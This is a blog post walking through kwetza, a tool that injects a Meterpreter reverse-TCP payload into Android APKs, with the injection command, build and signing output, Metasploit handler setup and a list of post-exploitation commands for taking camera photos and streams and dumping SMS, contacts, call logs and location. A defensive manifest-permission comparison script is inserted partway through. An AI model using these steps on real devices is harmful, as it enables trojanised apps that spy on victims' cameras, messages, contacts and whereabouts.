kwetza - A Python script for injecting a Meterpreter payload into Android applications
Author: webbaozi   Tuesday, June 13, 2017 14:47

Getting the code

First, get the code:

git clone https://github.com/sensepost/kwetza.git 

Kwetza is written in Python and requires BeautifulSoup, which can be installed using pip:

pip install beautifulsoup4 

Kwetza requires Apktool to be installed and accessible via your PATH. This can be set up using the install instructions located here: https://ibotpeaches.github.io/Apktool/install


Usage

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

  • nameOfTheApkToInfect.apk = name of the APK you wish to infect.
  • LHOST = IP of your listener.
  • LPORT = port of your listener.
  • yes/no = "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk
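
A defender-side check for the permission injection and re-signing shown above, added here as an example (it is not part of kwetza or of the original post): it compares the apktool-decoded AndroidManifest.xml of a known-good build with that of a suspect build and reports permissions that appear only in the suspect one. The sample manifests, the function names and the choice of which permissions to treat as sensitive are assumptions of this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
PERM_TAGS = ("uses-permission", "uses-permission-sdk-23")

# Real Android permission names covering camera, call log, contacts, SMS and
# location. Which ones to flag is an assumption of this example.
SENSITIVE = {
    "android.permission.CAMERA",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.ACCESS_FINE_LOCATION",
}

def permissions(manifest_xml):
    """Return the set of permission names requested in a decoded manifest."""
    # For manifests from untrusted APKs, a hardened parser such as defusedxml
    # is preferable to the standard-library one used here.
    root = ET.fromstring(manifest_xml)
    names = (e.get(ANDROID_NS + "name") for e in root.iter() if e.tag in PERM_TAGS)
    return {n for n in names if n}

def permission_drift(original_xml, suspect_xml):
    """Permissions present only in the suspect build, split by sensitivity."""
    added = permissions(suspect_xml) - permissions(original_xml)
    return {"sensitive": sorted(added & SENSITIVE),
            "other": sorted(added - SENSITIVE)}

# Constructed sample manifests (not taken from any real app).
ORIGINAL = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
</manifest>"""

SUSPECT = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
</manifest>"""

if __name__ == "__main__":
    for level, names in permission_drift(ORIGINAL, SUSPECT).items():
        for name in names:
            print(f"[{level}] permission added in suspect build: {name}")
```

Because the rebuilt APK is signed with a different key than the publisher's, comparing the signing certificate against the known-good release is a complementary check.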

Reproduction steps:

1. Run the command:


python kwetza.py hackme.apk 192.168.1.250 9696 yes



Keystore passphrase: password

2. Start a listener in msf


use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.250
set LPORT 9696
run



3. Return to the Android emulator and open the APK file generated earlier


4. Run commands


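Related commands:

cd               --> change directory, e.g. cd / switches to the root directory
search           --> search for files, e.g. search *.jpg
download         --> download a file, e.g. download test.jpg
webcam_list      --> list the cameras, since phones now have both front and rear cameras
webcam_snap      --> take a photo; the front or rear camera must be selected, e.g. webcam_snap -i 1
webcam_stream    --> start live camera video monitoring; same as above, e.g. webcam_stream -i 1

Android-specific commands:

check_root       --> check whether the Android device is rooted
dump_calllog     --> download the call log
dump_contacts    --> download the contacts
dump_sms         --> download the SMS messages
geolocate        --> locate the device using Google Maps (requires Google Maps to be installed)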

Download:

https://github.com/sensepost/kwetza

Baidu Cloud download:

Link: https://pan.baidu.com/s/1geDdWkj Password: 6666

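Article URL: http://www.webbaozi.com/sygj/72.html
Copyright notice: unless otherwise stated, all articles here are original works of "baozi|学与用"; please retain the source when reposting.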
压力机 2017-07-18 10:49
Hello, your website is very well made and looks great. I have bookmarked it so I can visit it at any time.
